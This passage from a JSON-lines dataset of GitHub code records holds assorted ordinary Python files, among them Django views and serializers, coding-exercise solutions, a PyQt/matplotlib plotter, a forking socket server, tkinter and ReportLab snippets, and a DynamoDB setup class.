logger_error.call_args_list,\n \"[GR108] - SamplePack pack(s) cannot have a mandatory dependency on the hidden pack SamplePack2\",\n )\n","repo_name":"demisto/demisto-sdk","sub_path":"demisto_sdk/commands/content_graph/tests/graph_validator_test.py","file_name":"graph_validator_test.py","file_ext":"py","file_size_in_byte":27044,"program_lang":"python","lang":"en","doc_type":"code","stars":64,"dataset":"github-code","pt":"52"} +{"seq_id":"25284736992","text":"from django.db import IntegrityError\nfrom rest_framework import serializers\nfrom .models import Favourite\n\n\nclass FavouriteSerializer(serializers.ModelSerializer):\n username = serializers.ReadOnlyField(source='username.username')\n\n class Meta:\n model = Favourite\n fields = [\n 'id',\n 'username',\n 'post',\n 'created_on',\n ]\n\n def create(self, validated_data):\n try:\n return super().create(validated_data)\n except IntegrityError:\n raise serializers.ValidationError({\n 'detail': 'duplicated favourite'\n })\n","repo_name":"llewellynksj/ecoflock-drf-api","sub_path":"favourites/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":638,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"18321569677","text":"#!/bin/python3\n\nimport math\nimport os\nimport random\nimport re\nimport sys\n\n\n#\n# Complete the 'minimumBribes' function below.\n#\n# The function accepts INTEGER_ARRAY q as parameter.\n#\n\ndef minimumBribes(q):\n # Write your code here\n\n jumps = 0\n 
for i, p in enumerate(q, start=1):\n # nobody can move more than two places ahead of their original position\n if p - i > 2:\n return \"Too chaotic\"\n # count the people now ahead of p who started behind them - one bribe each\n for j in range(max(0, p - 2), i - 1):\n if q[j] > p:\n jumps += 1\n return str(jumps)\n\n\nif __name__ == '__main__':\n q = [1, 2, 5, 3, 7, 8, 6, 4]\n\n print(minimumBribes(q))\n","repo_name":"lukaszbednarz/HackerRankWarmUp","sub_path":"NewYearChaos.py","file_name":"NewYearChaos.py","file_ext":"py","file_size_in_byte":603,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
+{"seq_id":"71405351525","text":"from django.contrib import messages\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nfrom django.core.exceptions import PermissionDenied\nfrom django.shortcuts import render, redirect\nfrom django.urls import reverse\nfrom django.views.generic import ListView\nfrom django.views.generic.base import View\nfrom django.views.generic.edit import FormMixin\n\nfrom documents.forms import DocumentForm\nfrom documents.models import Document, Category\n\n\ndef _get_exception_message(e):\n \"\"\"Returns the generic exception message\"\"\"\n return 'Surgió un error desconocido al eliminar el documento. Contacta a nuestro ' \\\n 'equipo técnico usando el correo: uesvirtual@ues.mx ' \\\n 'diciendo que surgió un error tipo: {}'.format(type(e).__name__)\n\n\nclass DocumentsHomeView(LoginRequiredMixin, FormMixin, ListView):\n \"\"\"\n Documents Home View.\n \"\"\"\n template_name = 'documents_home.html'\n model = Document\n paginate_by = 5\n form_class = DocumentForm\n\n def get_context_data(self, **kwargs):\n \"\"\"Used to attach a 'categories' object to the context\"\"\"\n context = super(DocumentsHomeView, self).get_context_data(**kwargs)\n context.update({\n 'categories': Category.objects.all()\n })\n return context\n\n def get_queryset(self):\n \"\"\"Filters by user\"\"\"\n query_set = super(DocumentsHomeView, self).get_queryset()\n query_set = query_set.filter(user=self.request.user)\n return query_set\n\n def get_success_url(self):\n \"\"\"Returns the url after a successful upload\"\"\"\n return reverse('documents:home')\n\n def post(self, request, *args, **kwargs):\n \"\"\"Handles the file upload\"\"\"\n form = DocumentForm(request.POST, request.FILES)\n if form.is_valid():\n file = form.save(commit=False)\n file.user = request.user\n file.save()\n messages.success(request, 'El documento \"{}\" se subió correctamente, ¡muchas gracias!'\n .format(form.files['file']))\n return self.form_valid(form)\n else:\n for error in form.errors['file']:\n messages.error(request, error)\n return redirect('documents:home')\n\n\nclass DocumentsDeleteView(View):\n \"\"\"\n Documents Delete View\n \"\"\"\n\n def post(self, request, *args, **kwargs):\n \"\"\"Deletes a document\"\"\"\n try:\n document_id = request.POST['document_id']\n document = Document.objects.filter(id=document_id).last()\n document.disabled = True\n document.save()\n messages.success(request, '¡El documento fue eliminado con éxito')\n except KeyError:\n messages.error(request, 'No se encontró el documento.')\n except Exception as e:\n messages.error(request, _get_exception_message(e))\n\n return redirect('documents:home')\n\n def dispatch(self, request, *args, **kwargs):\n \"\"\"Handles the case when a user tries to delete another user's document\"\"\"\n document_id = request.POST['document_id']\n document = Document.objects.filter(id=document_id).last()\n\n if not document:\n messages.error(request, 'No se encontró el documento.')\n return redirect('documents:home')\n\n if 
document.user.id != self.request.user.id:\n messages.error(request, 'No tiene permiso para eliminar el documento')\n raise PermissionDenied\n\n return super().dispatch(request, *args, **kwargs)\n","repo_name":"allanz1221/plataforma-diagnostico","sub_path":"diagnostico_project/documents/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3577,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
+{"seq_id":"20867641407","text":"#그리디 기출문제 - 곱하기 혹은 더하기 (chapter11-02)\n\n#문자열 S는 띄어쓰기 없이 문자열로 받기\ns = input()\n\n# 결과값 초기화\nresult = int(s[0])\n\n#문자열의 값을 하나씩 읽어나가며 값 구하기\nfor i in range(1, len(s)):\n num = int(s[i])\n #0과 1이 아닌 모든 경우에 대해서는 곱하기의 값이 더 크다\n if num<=1 or result<=1:\n result+=num\n else:\n result*=num\n\nprint(result)","repo_name":"giraffejin/Algorithm","sub_path":"Thisiscodingtest/Greedy/MultiplyOrAdd.py","file_name":"MultiplyOrAdd.py","file_ext":"py","file_size_in_byte":460,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
+{"seq_id":"72929801446","text":"#encoding: utf-8\n\nfrom django.shortcuts import render, get_object_or_404, redirect\nfrom django.http import HttpResponseRedirect\nfrom django.views.generic import ListView, DetailView\nfrom models import Produto, CategoriaProduto\n\nclass ProdutoListView(ListView):\n\n template_name = 'produtos/index.html'\n paginate_by = 10\n\n def get_context_data(self, **kwargs):\n context = super(ProdutoListView, self).get_context_data(**kwargs)\n context['categoria'] = CategoriaProduto.objects.all()\n context['album'] = Produto.objects.all()\n return context\n\n def get_queryset(self):\n produto = Produto.objects.filter(publico=True)\n searchproduto = self.request.GET.get('searchproduto')\n searchcategoria = self.request.GET.get('searchcategoria') \n \n if searchproduto and searchcategoria:\n produto = Produto.objects.filter(nome__icontains=searchproduto, categoria__nome__icontains=searchcategoria) \n return produto\n else:\n if not searchproduto and not searchcategoria:\n produto = Produto.objects.filter(publico=True) \n return produto\n else:\n if not searchproduto and searchcategoria:\n produto = Produto.objects.filter(categoria__nome__icontains=searchcategoria) \n return produto\n else:\n if not searchproduto:\n produto = Produto.objects.filter(categoria__nome__icontains=searchcategoria) \n return produto\n else:\n if not searchcategoria:\n produto = Produto.objects.filter(nome__icontains=searchproduto) \n return produto\n\nclass ProdutoDetailView(DetailView):\n \n template_name = 'produtos/detalhes.html'\n context_object_name = 'produto'\n \n def get_queryset(self): \n if not self.request.user.is_authenticated():\n return Produto.objects.filter(publico=True)\n return Produto.objects.all()\n","repo_name":"oeiselino/projeto_site","sub_path":"produtos/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2100,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
+{"seq_id":"13607909585","text":"#\n# Example file for working with loops\n#\n\ndef main():\n x = 0\n\n # define a while loop\n while(x <5):\n print(x)\n x = x + 1\n\n\n # define a for loop\n for x in range(5,10): #start at 5 and stop at 10\n print(x)\n\n\n # use a for loop over a collection\n days= [\"Mon\", \"Tue\", \"Wed\", \"Thu\", \"Fri\", \"Sat\", \"Sun\"]\n #d will be set to the current item each time through the loop\n for d in days:\n print(d)\n\n \n # use the break and continue statements\n for x 
in range(5,10):\n #if(x == 7): break\n if(x % 2 == 0): continue #continue = skip rest of the loop and just go back to the top of the loop and start with next value\n print(x)\n\n\n #using the enumerate() function to get index \n days= [\"Mon\", \"Tue\", \"Wed\", \"Thu\", \"Fri\", \"Sat\", \"Sun\"]\n #enumerate will return two values which are the index number of the element and the element itself\n for i,d in enumerate(days):\n print(i,d)\n \nif __name__ == \"__main__\":\n main()\n","repo_name":"lydia0423/Machine_Learning","sub_path":"Python/Python Basic/Lynda.com/Learning Python/Exercise/Ch2/loops_start.py","file_name":"loops_start.py","file_ext":"py","file_size_in_byte":953,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"21679502059","text":"# main.py\n'''\n项目主流程控制模块\n'''\nimport sys, os\nimport traceback\nimport signal\nfrom socket import *\nsys.path.append('/Users/guolei/Desktop')\n\nfrom microblog.microblog.conf import conf\nfrom microblog.microblog.msg import msgdecoder\nfrom microblog.microblog.deal import msgdeal\n\n\ncf = conf.ConfigReader('../config.ini')\nserverconfig = cf.getdic(\"server\")\nmysqlconfig = cf.getdic(\"mysql\")\n\n#初始化数据库\ndef init_database():\n\tdatabase = mysqlconfig.get(\"database\")\n\tif not isExsits(database):\n\t\tinit_tables()\n\n\ndef getsocket(host, port):\n\taddr = (host, port)\n\ts = socket()\n\ts.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)\n\ts.bind(addr)\n\ts.listen(10)\n\treturn s\n\ndef server_start(host, port, buffersize):\n\tprint(\"服务器端开始启动\")\n\n\ttry:\n\t\t#初始化数据库\n\t\t#检查数据库是否存在\n\t\t#不存在则执行建库建表语句,存在则无需动作\n\t\t# initdatabase()\n\t\ts = getsocket(host, port)\n\t\tsignal.signal(signal.SIGCHLD, signal.SIG_IGN)\n\t\tprint(\"服务器端启动成功\")\n\texcept Exception as e:\n\t\ttraceback.print_exc()\n\t\tprint(\"服务器端启动失败\")\n\t\treturn\n\n\twhile True:\n\t\ttry:\n\t\t\tc, addr = s.accept()\n\t\t\tprint(\"conn from :\", addr)\n\t\texcept KeyboardInterrupt:\n\t\t\tprint(\"服务端退出\")\n\t\t\ts.close()\n\t\t\tsys.exit(0)\n\t\texcept Exception:\n\t\t\tcontinue\n\n\t\tpid = os.fork()\n\t\tif pid < 0:\n\t\t\tprint(\"创建子进程失败\")\n\t\t\tc.close()\n\t\t\tcontinue\n\t\telif pid == 0:\n\t\t\ts.close()\n\n\t\t\t#创建业务处理对象\n\t\t\tdeal = msgdeal.MsgDeal(c)\n\t\t\t#创建客户端通信对象\n\t\t\twhile True:\n\t\t\t#接收客户端的请求类型\n\t\t\t\t#获接收请求的总长度,5个字节为长度位\n\t\t\t\tdata_size = int(c.recv(5).decode())\n\t\t\t\t#收到的总长度\n\t\t\t\trecv_size = 0\n\t\t\t\ttotal_data = \"\"\n\t\t\t\twhile recv_size < data_size:\n\t\t\t\t\tdata = c.recv(buffersize).decode()\n\t\t\t\t\tif 0 < data_size - len(data) < buffersize:\n\t\t\t\t\t\tleft_data = c.recv(data_size - len(data)).decode()\n\t\t\t\t\t\ttotal_data += left_data\n\t\t\t\t\ttotal_data += data\n\t\t\t\t\trecv_size += len(data)\n\t\t\t\t\n\t\t\t\t# print(\"收到报文体为 :\", total_data)\n\t\t\t\t#解析xml报文\n\t\t\t\tmsgdict = msgdecoder.decode_msg_to_dict(total_data)\n\t\t\t\tprint(\"交易报文的字典为:\", msgdict)\n\t\t\t\t#获取报文的交易类型\n\t\t\t\t# transtype = msgdict.get(\"transType\",\"没有此交易类型\")\n\t\t\t\t\n\t\t\t\tdeal.deal(msgdict)\n\n\t\t\t\t# if msgtype == '1001':\n\t\t\t\t# \tprint(\"我要登录\")\n\t\t\t\t# \tpass\n\t\t\t\t# elif msgtype == '1002':\n\t\t\t\t# \tprint(\"我要注册\")\n\t\t\t\t# \tpass\n\t\t\t\t# elif msgtype == '1003':\n\t\t\t\t# \tpass\n\t\t\t\t# elif data[0] == '1004':\n\t\t\t\t# \tpass\n\t\t\t\t\n\n\t\telse:\n\t\t\tc.close()\n\t\t\tcontinue\n\n\n# def server_stop(pid):\n# \tos.kill(pid, signal.SIGKILL)\n\n#服务器主流程控制函数\ndef main():\n\tif len(sys.argv) < 2:\n\t\tprint(\"cmd is error , pls 
use:\")\n\t\tprint(\"'python3 server.py start' or 'python3 server.py stop'\")\n\t\treturn\n\n\t#获取服务器配置\n\t\n\thost = serverconfig.get(\"host\")\n\tport = int(serverconfig.get(\"port\"))\n\tbuffersize = int(serverconfig.get(\"buffersize\"))\n\tpid = os.getpid()\n\n\tif sys.argv[1] == 'start':\n\t\tserver_start(host, port, buffersize)\n\t# elif sys.argv[1] == 'stop':\n\n\t# \tserver_stop(pid)\n\telse:\n\t\tprint(\"cmd is error , pls use:\")\n\t\tprint(\"'python3 server.py start' or 'python3 server.py stop'\")\n\t\treturn\n\n\n\n\n\n\n\n\n\n\n\nif __name__ == '__main__':\n\tmain()\n\n\t\n\n\n\n\n\n\n","repo_name":"kep-w/Microblog_PyQt5_TCP_MySQL","sub_path":"server/microblog/server_fork.py","file_name":"server_fork.py","file_ext":"py","file_size_in_byte":3230,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"39241490040","text":"\r\n\r\nclass dict_process:\r\n\r\n def __init__(self,fname,lname,age,fullname,address,skillset):\r\n self.fname=fname\r\n self.lname=lname\r\n self.age=age\r\n self.fullname=fullname\r\n self.address=address\r\n self.skillset=skillset\r\n\r\n \r\n @classmethod\r\n\r\n def d_process(cls,dict):\r\n fname=dict['fname']\r\n lname=dict['lname']\r\n age=dict['age']\r\n fullname=dict['fullname']\r\n address=dict['address']\r\n skillset=dict['skillset']\r\n return dict_process(fname,lname,age,fullname,address,skillset) \r\n\r\ndict={'fname': 'indhu', 'lname': 'mathy', 'age': 25, 'fullname': 'indhu mathy', 'address': {'city': 'chennai', 'state': 'TN', 'zip': '627117'}, 'skillset': ['Python', 'SQL', 'Tableau', 'AWS']}\r\ns=dict_process.d_process(dict)\r\nprint (s.address)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"IndhumathyChelliah/PythonProject","sub_path":"Simple Programs-solutions/soln2.py","file_name":"soln2.py","file_ext":"py","file_size_in_byte":844,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"} +{"seq_id":"6098578207","text":"import sys\nfrom PyQt6 import QtCore\nfrom PyQt6.QtCore import *\nfrom PyQt6.QtWidgets import *\n\nimport matplotlib.pyplot as plt\nfrom matplotlib.backends.backend_qt5agg import FigureCanvasQTAgg as FigureCanvas\nimport matplotlib.animation as animation\nimport numpy as np\n\n\nfrom utils import getmylogger \nfrom utils import ZMQReceiver\n\nlog = getmylogger(__name__)\n\nplt.style.use('dark_background')\n\n\nclass MainWindow(QWidget):\n def __init__(self):\n super(MainWindow, self).__init__()\n self.title = \"Plot\"\n # Set up the main window\n self.setWindowTitle(self.title)\n self.setMinimumSize(300, 300)\n\n # Create GUI Layout\n self.layout = QGridLayout()\n self.layout.setContentsMargins(10, 10, 10, 10)\n self.setLayout(self.layout)\n\n # Create the widget\n plotWidget = MatplotlibWidget(self, )\n self.layout.addWidget(plotWidget)\n\n self.initSignals()\n\n\n def initSignals(self):\n self.signals = [{\n \"Name\": \"\",\n \"Value\": 0,\n \"Format\": \":x\" #value after frist : delim\n }]\n\n\nclass MatplotlibWidget(QWidget):\n def __init__(self, parent=None):\n super(MatplotlibWidget, self).__init__(parent)\n self.topic = \"\"\n self.subAddr = 'ipc://SHARED' \n\n\n # Create a figure and axis for the plot\n self.x_len = 200\n self.y_range = [-2,2]\n self.fig = plt.figure()\n self.ax = self.fig.add_subplot(1,1,1)\n\n self.canvas = FigureCanvas(self.fig)\n # Create the ZMQ Receiver Thread\n self.receiver = ZMQReceiver(self.topic, self.subAddr)\n self.receiver.socketDataSig.connect(self._updateData)\n 
self.receiver.start()\n\n # Create a layout to hold the plot\n layout = QVBoxLayout()\n layout.addWidget(self.canvas)\n self.setLayout(layout)\n\n # Initialize the plot\n self.xs = list(range(0,self.x_len))\n self.ys = [0] * self.x_len\n self.y2s = [0] * self.x_len\n self.ax.set_ylim(self.y_range)\n self.line, = self.ax.plot(self.xs, self.ys, label = \"roll\")\n self.line2, = self.ax.plot(self.xs, self.y2s, label = \"avg\")\n self.ax.legend()\n self.animation = animation.FuncAnimation(self.fig,self.animate,fargs=(self.ys,self.y2s),interval=16,blit=True,cache_frame_data=False)\n \n @QtCore.pyqtSlot(str)\n def _updateData(self, msg):\n #@Brief: Gets called via a Qt slot when new data is received over ZMQ\n try:\n yval = float(msg.split(\":\")[0])\n # np.convolve needs a sequence, not a scalar: average the previous and current samples\n avg = self.moving_average(self.ys[-1:] + [yval], 2)\n self.ys.append(yval)\n self.y2s.append(avg[0])\n except Exception as e:\n log.error(e)\n \n def animate(self, i, ys, y2s):\n #@Brief: gets called by the Matplotlib FuncAnimation loop\n # Update the plot with new data\n # Limit y list to set number of items\n self.ys = self.ys[-self.x_len:]\n self.y2s = self.y2s[-self.x_len:]\n # Update line with new Y values\n self.line.set_ydata(self.ys)\n self.line2.set_ydata(self.y2s)\n return self.line, self.line2\n\n def moving_average(self, data, window_size):\n return np.convolve(data, np.ones(window_size)/window_size, mode='valid')\n\n\n\ndef main():\n app = QApplication(sys.argv)\n main_window = MainWindow()\n main_window.show()\n sys.exit(app.exec())\n\nif __name__ == '__main__':\n main()\n","repo_name":"Wrodders/dBot","sub_path":"Tools/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":3432,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
+{"seq_id":"32123007419","text":"# Yêu cầu:\n# 1. nhập n\n# 2. nhập n phần tử\n# 3. 
đếm người bị béo phì\n\n# |CHƯƠNG TRÌNH CHÍNH|\nn = int(input())\n\nds = []\n\nfor i in range(0, n, 1):\n chieu_cao = float(input())\n can_nang = float(input())\n\n item = [chieu_cao, can_nang]\n\n ds.append(item)\n\ndem_BeoPhi = 0\n\n# hàm tính BMI\ndef Ham_Tinh_BMI(chieu_cao, can_nang):\n return can_nang / (chieu_cao**2)\n\nfor i in range(0, n, 1):\n if Ham_Tinh_BMI(ds[i][0], ds[i][1]) >= 30:\n dem_BeoPhi = dem_BeoPhi + 1\n\nprint(dem_BeoPhi)","repo_name":"conggaro/Hoc_Python","sub_path":"Nhập môn khoa học máy tính/Tuần 9/Bài thực hành lập trình tuần 9 ___ cơ bản/Lần 2/cau_hoi_5.py","file_name":"cau_hoi_5.py","file_ext":"py","file_size_in_byte":523,"program_lang":"python","lang":"vi","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"22133670903","text":"\n#!/usr/bin/env python3\n\nfrom tkinter import *\n\nroot = Tk()\nroot.title(\"My GUI application\")\nroot.geometry(\"500x200+400+200\")\n\nlabel = Label(root, text=\"Type your name!\")\nlabel.pack()\n\nentry = Entry(root)\nentry.pack()\n\ndef saveName():\n\tfile = open(\"name.txt\", \"a\")\n\tfile.write(\"%s\\n\" % entry.get())\n\tentry.delete(0, END)\n\nbutton = Button(root, text=\"Save\", command = saveName)\nbutton.pack()\n\nroot.mainloop()\n","repo_name":"AcornPublishing/python3-for-hacker","sub_path":"14-10.py","file_name":"14-10.py","file_ext":"py","file_size_in_byte":409,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"34185255570","text":"from xml.etree import cElementTree as et\n\nfrom mt_metadata.base.helpers import write_lines, element_to_string\nfrom mt_metadata.base import get_schema, Base\nfrom .standards import SCHEMA_FN_PATHS\nfrom mt_metadata.transfer_functions.io.emtfxml.metadata import helpers\n\n# =============================================================================\nattr_dict = get_schema(\"orientation\", SCHEMA_FN_PATHS)\n# =============================================================================\n\n\nclass Orientation(Base):\n __doc__ = write_lines(attr_dict)\n\n def __init__(self, **kwargs):\n\n super().__init__(attr_dict=attr_dict, **kwargs)\n\n def read_dict(self, input_dict):\n \"\"\"\n\n :param input_dict: DESCRIPTION\n :type input_dict: TYPE\n :return: DESCRIPTION\n :rtype: TYPE\n\n \"\"\"\n element_dict = {self._class_name: input_dict[self._class_name]}\n if isinstance(element_dict[self._class_name], str):\n element_dict[self._class_name] = {\n \"layout\": element_dict[self._class_name]\n }\n\n self.from_dict(element_dict)\n\n def to_xml(self, string=False, required=True):\n \"\"\"\n Overwrite to XML to follow EMTF XML format\n\n :param string: DESCRIPTION, defaults to False\n :type string: TYPE, optional\n :param required: DESCRIPTION, defaults to True\n :type required: TYPE, optional\n :return: DESCRIPTION\n :rtype: TYPE\n\n \"\"\"\n\n if self.layout == \"orthogonal\":\n if self.angle_to_geographic_north is None:\n self.angle_to_geographic_north = 0.0\n root = et.Element(\n self.__class__.__name__.capitalize(),\n {\n \"angle_to_geographic_north\": f\"{self.angle_to_geographic_north:.3f}\"\n },\n )\n root.text = self.layout\n else:\n root = et.Element(self.__class__.__name__.capitalize())\n root.text = self.layout\n\n if not string:\n return root\n else:\n return 
element_to_string(root)\n","repo_name":"kujaku11/mt_metadata","sub_path":"mt_metadata/transfer_functions/io/emtfxml/metadata/orientation.py","file_name":"orientation.py","file_ext":"py","file_size_in_byte":2107,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"52"} +{"seq_id":"39262038943","text":"import pytest\nimport numpy as np\nfrom lasagne.layers import GlobalPoolLayer\nfrom lasagne.layers import InputLayer\nimport theano.tensor as T\n\nfrom foolbox.models import LasagneModel\n\n\n@pytest.mark.parametrize('num_classes', [10, 1000])\ndef test_lasagne_model(num_classes):\n bounds = (0, 255)\n channels = num_classes\n\n def mean_brightness_net(images):\n logits = GlobalPoolLayer(images)\n return logits\n\n images_var = T.tensor4('images')\n images = InputLayer((None, channels, 5, 5), images_var)\n logits = mean_brightness_net(images)\n\n model = LasagneModel(\n images,\n logits,\n bounds=bounds)\n\n test_images = np.random.rand(2, channels, 5, 5).astype(np.float32)\n test_label = 7\n\n assert model.batch_predictions(test_images).shape \\\n == (2, num_classes)\n\n test_logits = model.predictions(test_images[0])\n assert test_logits.shape == (num_classes,)\n\n test_gradient = model.gradient(test_images[0], test_label)\n assert test_gradient.shape == test_images[0].shape\n\n np.testing.assert_almost_equal(\n model.predictions_and_gradient(test_images[0], test_label)[0],\n test_logits)\n np.testing.assert_almost_equal(\n model.predictions_and_gradient(test_images[0], test_label)[1],\n test_gradient)\n\n assert model.num_classes() == num_classes\n","repo_name":"AlexMikhalev/foolbox","sub_path":"foolbox/tests/test_models_lasagne.py","file_name":"test_models_lasagne.py","file_ext":"py","file_size_in_byte":1344,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"52"} +{"seq_id":"12673414430","text":"# -*- coding: utf-8 -*-\n\"\"\"\n@Author : LEITENG\n@Version : \n------------------------------------\n@File : p67_poem.py\n@Description : \n@CreateTime : 2020/7/25 18:55\n------------------------------------\n@ModifyTime : 诗歌生成\n\"\"\"\nimport p50_framework as myf\nfrom p48_BufferDS import BufferDS\nfrom p66_read_qts import QTS\nimport tensorflow as tf\nimport numpy as np\n\n\nclass MyConfig(myf.Config):\n def __init__(self):\n super(MyConfig, self).__init__()\n self.qts_path = './texts/qts.txt'\n self._ds = None\n\n # 输入向量长度\n self.num_units = 200\n # 循环次数\n self.num_steps = 32\n # 批次\n self.batch_size = 100\n\n def ds(self):\n '''\n 去获取 bufferds 对象\n :return:\n '''\n self.make_ds()\n return self._ds\n\n def make_ds(self):\n if self._ds is None:\n qts = QTS(self.qts_path)\n self._ds = BufferDS(1000, qts, self.batch_size)\n # 中文字符的个数\n self._num_chinese_chars = qts.get_num_chars()\n\n def num_chinese_chars(self):\n self.make_ds()\n return self._num_chinese_chars\n\n def get_ds_train(self):\n return self.ds()\n\n def get_ds_test(self):\n return self.get_ds_train()\n\n def get_name(self):\n return 'p67'\n\n def get_sub_tensors(self, gpu_id):\n return MySubTensors(self)\n\n\nclass MySubTensors:\n def __init__(self, cfg: MyConfig):\n self.config = cfg\n\n x = tf.placeholder(tf.int64, [None, cfg.num_steps], 'x') # [-1, 32]\n self.inputs = [x]\n\n x = tf.one_hot(x, cfg.num_chinese_chars()) # [-1, 32, 4340]\n y = tf.layers.dense(x, cfg.num_units, name='dense1') # [-1, 32, 200]\n\n cell = tf.nn.rnn_cell.LSTMCell(cfg.num_units, name='cell')\n state = cell.zero_state(tf.shape(y)[0], y.dtype)\n y_predict = []\n losses = []\n with 
tf.variable_scope('for') as scope:\n for i in range(cfg.num_steps):\n yi, state = cell(y[:, i, :], state) # [-1, 200]\n\n logits = tf.layers.dense(yi, cfg.num_chinese_chars(), name='dense2')\n y_predict.append(logits)\n\n if i < cfg.num_steps - 1:\n # 32 个输出\n # 让当前的 logits 与下一次的输入计算交叉熵\n loss = tf.nn.softmax_cross_entropy_with_logits_v2(labels=x[:, i+1, :], logits=logits)\n losses.append(loss)\n scope.reuse_variables()\n\n self.losses = [tf.reduce_mean(losses)]\n\n\nif __name__ == '__main__':\n cfg = MyConfig()\n cfg.from_cmd()","repo_name":"provenclei/tensorflow_cv","sub_path":"deeplearning_tensorflow_p/p67_poem.py","file_name":"p67_poem.py","file_ext":"py","file_size_in_byte":2690,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"24789018494","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Mar 27 23:05:42 2017\n\n@author: Ivan Luchko (luchko.ivan@gmail.com)\n\n2D oscillation: matplotlib animation manager usage example \n\"\"\" \nimport sys\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom mpl_animationmanager import AnimationManager\n\n\ndef fAnim(i, ax, fargs):\n '''define modification animation function'''\n line, tdata, ydata = fargs\n line.set_data(tdata[:i], ydata[:i])\n\n\ndef get_animManager():\n \"\"\"Return axample of configured AnimationManager instance\"\"\"\n \n NUM_STEPS = 400\n STEP = 0.05\n\n fig = plt.figure('2D oscillation example') \n ax = fig.gca()\n ax.set_ylim(-1.1, 1.1)\n ax.set_xlim(0, STEP*NUM_STEPS)\n ax.grid()\n \n line, = ax.plot([], [], lw=2)\n tdata = [STEP*i for i in range(NUM_STEPS)]\n ydata = [np.sin(2*np.pi*t) * np.exp(-t/5.) for t in tdata]\n \n # pass figure to animation manager\n mng = AnimationManager(ax, fAnim=fAnim, fargs=(line, tdata, ydata), \n numFramesModif=NUM_STEPS)\n # set some initial parameters\n mng.dlg.spinBox_period_modif.setValue(10)\n\n return mng\n \n\ndef run():\n \"\"\"run example\"\"\"\n \n mng = get_animManager()\n \n return mng.run()\n \n \nif __name__ == '__main__':\n sys.exit(run())","repo_name":"luchko/mpl_animationmanager","sub_path":"mpl_animationmanager/examples/oscillation_2D.py","file_name":"oscillation_2D.py","file_ext":"py","file_size_in_byte":1336,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"52"} +{"seq_id":"35636602209","text":"from reportlab.platypus import SimpleDocTemplate, Paragraph, Spacer,Image\nfrom reportlab.lib.styles import getSampleStyleSheet,ParagraphStyle\nfrom reportlab.rl_config import defaultPageSize\nfrom reportlab.lib.units import inch\nfrom reportlab.lib.pagesizes import letter \nfrom reportlab.lib.enums import TA_CENTER,TA_JUSTIFY\n\ndocument=[]\ndocument.append(Image('tools-64.png',2.2*inch,2.2*inch))\n\n\ndef addTitle(doc):\n \n style = getSampleStyleSheet() \n doc.append(Spacer(1,20))\n doc.append(Paragraph('Bla bla',ParagraphStyle('Name', alignment=TA_CENTER,\n fontFamily='Helvetica',fontSize=36))) \n \n doc.append(Spacer(1,50))\n return(doc)\n\ndef addParagraphs(doc):\n lsValores=[('1', 'wwww', '5555'), ('2', 'ggggg', '3333'), ('3', 'eeeee', '77777')] \n for valor in lsValores:\n print(valor[0])\n #ERRO\n #doc.append(Paragraph())\n #doc.append(Paragraph('''XXXXXXXXXXXXXX'''))\n doc.append(Spacer(1,20))\n return(doc) \n\ndocument= addTitle(document)\n\nSimpleDocTemplate('nomeDoc.pdf',pagesize=letter,rightMargin=12,\n leftMargin=12,\n bottomMargin=6).build(addParagraphs(document)) ","repo_name":"FerGVargas/Dev.Full_Stack","sub_path":"Mundo 
1/Missão Certificação/estudos/gerarPDF/lendoTxt2 debugar.py","file_name":"lendoTxt2 debugar.py","file_ext":"py","file_size_in_byte":1197,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"32111047859","text":"budget = float(input())\nprice_flour = float(input())\nprice_eggs = 0.75 * price_flour\nprice_milk = 1.25 * price_flour\nloaves = 0\nprice_per_loaf = price_flour + price_eggs + 0.25 * price_milk\ncount_loaves = 0\ncolored_eggs = 0\n\nwhile budget > price_per_loaf:\n count_loaves += 1\n colored_eggs += 3\n if count_loaves % 3 == 0:\n colored_eggs -= count_loaves - 2\n budget -= price_per_loaf\n\n\nprint(f\"You made {count_loaves} loaves of Easter bread! Now you have {colored_eggs} eggs and {budget:.2f}BGN left.\")","repo_name":"pepapopova/SoftUni-Courses","sub_path":"Fundamentals/Basic Syntax, Conditional Statements and Loops/easter_bread.py","file_name":"easter_bread.py","file_ext":"py","file_size_in_byte":518,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"13776911522","text":"from __future__ import print_function # Python 2/3 compatibility\nimport boto3\n\n\n\nclass DynamoDBTest:\n\n def __init__(self):\n self._dynamodb = boto3.resource('dynamodb', region_name='ap-northeast-1', endpoint_url=\"http://localhost:8000\")\n\n\n def _create_table(self):\n table = self._dynamodb.create_table(\n TableName='Order',\n KeySchema=[\n {\n 'AttributeName': 'order_id',\n 'KeyType': 'HASH' #Partition key\n },\n {\n 'AttributeName': 'ts',\n 